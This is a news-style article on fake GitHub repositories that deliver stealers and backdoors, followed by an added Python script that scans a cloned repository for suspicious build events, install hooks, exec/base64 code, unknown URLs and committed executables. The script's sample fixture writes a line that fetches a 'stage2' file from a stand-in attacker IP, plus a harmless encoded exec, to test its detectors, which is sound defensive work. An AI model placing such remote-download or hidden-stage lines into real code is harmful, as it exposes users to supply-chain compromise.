Fake GitHub Projects Hide Malicious Code, Researchers Warn

Banana Squad Returns With a Fresh Batch of Booby-Trapped Repositories

Security analysts at ReversingLabs say they have uncovered a new surge of activity by a group they call Banana Squad. The actors have opened and maintained more than 67 GitHub projects that pretend to contain handy Python hacking tools. Instead, anyone who downloads and runs the code receives a hidden payload that can steal personal data and open a backdoor on Windows machines. The discovery echoes a 2023 incident in which the same crew slipped poisoned packages into the Python Package Index, racking up more than 75,000 downloads before the scheme came to light.

Game Cheats and “Account Cleaners” Reel In Victims

The crooks are banking on the curiosity of people looking for quick wins online, whether that means removing old Discord files, grabbing rare TikTok handles, or finding exploits for Fortnite. Searches for phrases such as “Fortnite External Cheat,” “PayPal bulk account checker,” and “Discord account cleaner” often point users toward the malicious projects. Once the victim installs the code, a silent downloader fetches extra scripts that can tamper with cryptocurrency wallets like Exodus and ship all the harvested data to an external server controlled by the attackers.

Although GitHub has now pulled the poisoned repositories, ReversingLabs warns that copy-cat projects can pop up at any time. Robert Simmons, a threat researcher with the firm, notes that mischief makers are “leaning hard on public code hosts as a free delivery network,” underscoring the need for developers to read the source and verify each download.

GitHub Becomes a Prime Launchpad for Malware

Banana Squad is far from alone. Over the past few months, other threat groups have treated GitHub like a ready-made content delivery network. Researchers at Trend Micro recently flagged 76 separate projects tied to a group nicknamed Water Curse. Their staged payloads swipe passwords, browser cookies, and other session data while planting tools that let the attackers slip back into the computer later.

Another investigation by Check Point shone a light on the so-called Stargazers Ghost Network. That operation spins up batches of ghost accounts—profiles that look real on the surface, complete with stars, forks, and frequent updates—to float Java malware aimed at Minecraft fans. By padding each page with fake popularity signals, the criminals bump their work to the top of GitHub’s search results, giving the lure extra credibility.

A Broader Distribution-as-a-Service Underground

Digging deeper, Check Point and Checkmarx believe the ghost network is only one arm of a larger distribution-as-a-service marketplace, where crooks rent out delivery channels the way legitimate firms rent cloud servers. Sophos backs up that view with its own findings: analysts there tied 133 backdoored GitHub projects to an operation that has been running since mid-2022. Most of those projects concealed malicious code inside Visual Studio build scripts that run whenever the project is compiled, in Python files, in JavaScript snippets, or even in doctored Windows screensaver (.scr) binaries. Once executed, the implants pilfer system information, capture screenshots, and in many cases load well-known remote-access trojans such as AsyncRAT, Remcos, and Lumma Stealer.

Sophos believes the operators push the links through Discord channels and YouTube tutorials that promise easy game hacks or turnkey cyber-attack kits. Inexperienced users who compile the source on their own computers wind up infecting themselves—a twist that turns the criminals’ would-be customers into fresh victims.

Double-Check Before You Clone

The ongoing wave of poisoned repositories shows how software supply-chain attacks have shifted from fringe concern to everyday threat. Whereas companies once worried mainly about tainted browser plug-ins or rogue mobile apps, today’s attackers hide in plain sight on one of the world’s largest development platforms.

ReversingLabs stresses that developers should treat every GitHub project, especially one offering shortcuts, cheats, or account utilities, with healthy skepticism. Download the code, read through the files before building or running anything, and confirm that each script does exactly what the description claims. Pay special attention to build steps (a pre- or post-build event in a Visual Studio project file executes every time the project is compiled), installer scripts (a setup.py that overrides the install command runs code at pip install time), any external URLs hard-coded in the source, and executables such as screensaver files checked into a source tree.
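The following script is an added example, not code from ReversingLabs, Sophos, or any of the projects discussed; it automates the first pass of the manual review described above and flags the hiding spots named in the Sophos findings (build events in Visual Studio project files, install-time hooks in setup.py, exec/eval-style Python, hard-coded URLs to hosts outside an assumed allow-list, and executables committed to the tree). The allow-list, the regexes, and the sample repository it builds in a temporary directory are all assumptions constructed for the demonstration; a hit means "read this file by hand before you build or run it", not "this is malware".

```python
"""Triage a cloned repository for the hiding spots the article names. Added
illustration, not a vendor tool: ALLOWED_HOSTS, the patterns, and the sample
tree written by build_sample_repo() are assumptions made for this example."""
import os
import re
import sys
import tempfile
import textwrap
from collections import namedtuple

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
ALLOWED_HOSTS = {"github.com", "pypi.org", "files.pythonhosted.org"}  # assumed allow-list
VS_PROJECT_EXTS = {".csproj", ".vcxproj", ".vbproj", ".targets", ".props"}
VS_BUILD_EVENT_RE = re.compile(r"<(?:Pre|Post)BuildEvent>", re.IGNORECASE)  # runs on every build
PY_SUSPECT_RE = re.compile(  # constructs that typically wrap a downloader or a decoded stage
    r"\b(?:exec|eval)\s*\(|base64\.b64decode|marshal\.loads|zlib\.decompress"
    r"|__import__\s*\(|subprocess\.(?:Popen|run|call)\(")
PY_INSTALL_HOOK_RE = re.compile(  # setup.py cmdclass overrides run at `pip install` time
    r"cmdclass\s*=|class\s+\w+\s*\(\s*(?:install|develop|egg_info)\s*\)")
BINARY_EXTS = {".scr", ".exe", ".dll", ".pyd"}

Finding = namedtuple("Finding", "path kind detail")


def extract_hosts(text):
    hosts = set()
    for url in URL_RE.findall(text):
        host = re.sub(r"^https?://", "", url, flags=re.IGNORECASE)
        hosts.add(host.split("/")[0].split(":")[0].lower())
    return hosts


def scan_file(root, path):
    rel = os.path.relpath(path, root)
    ext = os.path.splitext(path)[1].lower()
    if ext in BINARY_EXTS:
        return [Finding(rel, "binary", "executable committed to the source tree")]
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    if ext in VS_PROJECT_EXTS and VS_BUILD_EVENT_RE.search(text):
        findings.append(Finding(rel, "build-event", "Pre/PostBuildEvent runs a command at build time"))
    if ext == ".py":
        for m in PY_SUSPECT_RE.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            findings.append(Finding(rel, "py-suspect", f"line {line}: {m.group(0)}"))
        if os.path.basename(path) == "setup.py" and PY_INSTALL_HOOK_RE.search(text):
            findings.append(Finding(rel, "install-hook", "custom cmdclass runs at pip install time"))
    for host in sorted(extract_hosts(text) - ALLOWED_HOSTS):
        findings.append(Finding(rel, "external-url", host))
    return findings


def scan_repo(root):
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]  # skip git internals
        for name in sorted(filenames):
            findings.extend(scan_file(root, os.path.join(dirpath, name)))
    return findings


def build_sample_repo():
    """Constructed 'account cleaner' tree (not a real repository) written to a temp dir."""
    root = tempfile.mkdtemp(prefix="repo-triage-")
    files = {
        "README.md": "# Discord Account Cleaner\nSource: https://github.com/example/cleaner\n",
        "cleaner.py": textwrap.dedent("""\
            import base64, requests
            exec(base64.b64decode("cHJpbnQoJ2hpJyk="))  # decoded second stage
            requests.get("http://198.51.100.7/stage2.py")  # TEST-NET-2 address, constructed
            """),
        "setup.py": textwrap.dedent("""\
            from setuptools import setup
            from setuptools.command.install import install
            class PostInstall(install):
                pass
            setup(name="cleaner", cmdclass={"install": PostInstall})
            """),
        "Tool.csproj": "<Project><PropertyGroup><PreBuildEvent>powershell -c Write-Host build</PreBuildEvent></PropertyGroup></Project>\n",
        "theme.scr": b"MZ\x90\x00",  # fake PE header only
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "wb" if isinstance(body, bytes) else "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_repo()
    for finding in scan_repo(target):
        print(f"{finding.kind:13} {finding.path}: {finding.detail}")
```

Run it as `python triage.py /path/to/clone` against a fresh clone; with no argument it scans the constructed sample, which yields one finding each for the build event, the install hook, the screensaver binary, and the unknown host, plus two for the exec/base64 line, while the README's github.com link passes the allow-list. The regexes are deliberately broad: a real project that spawns subprocesses or decodes base64 will trip them, which is the point, since those are exactly the lines worth reading before you run anything.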

GitHub, for its part, has improved automated scanning and takedown procedures, but the sheer volume of new projects means dangerous code can stick around long enough to snare the unwary. Until stronger safeguards take hold, users must remain the final gatekeepers. Just a few minutes spent verifying the integrity of a repository can stop a hidden stealer or backdoor from turning a helpful tool into a costly breach.
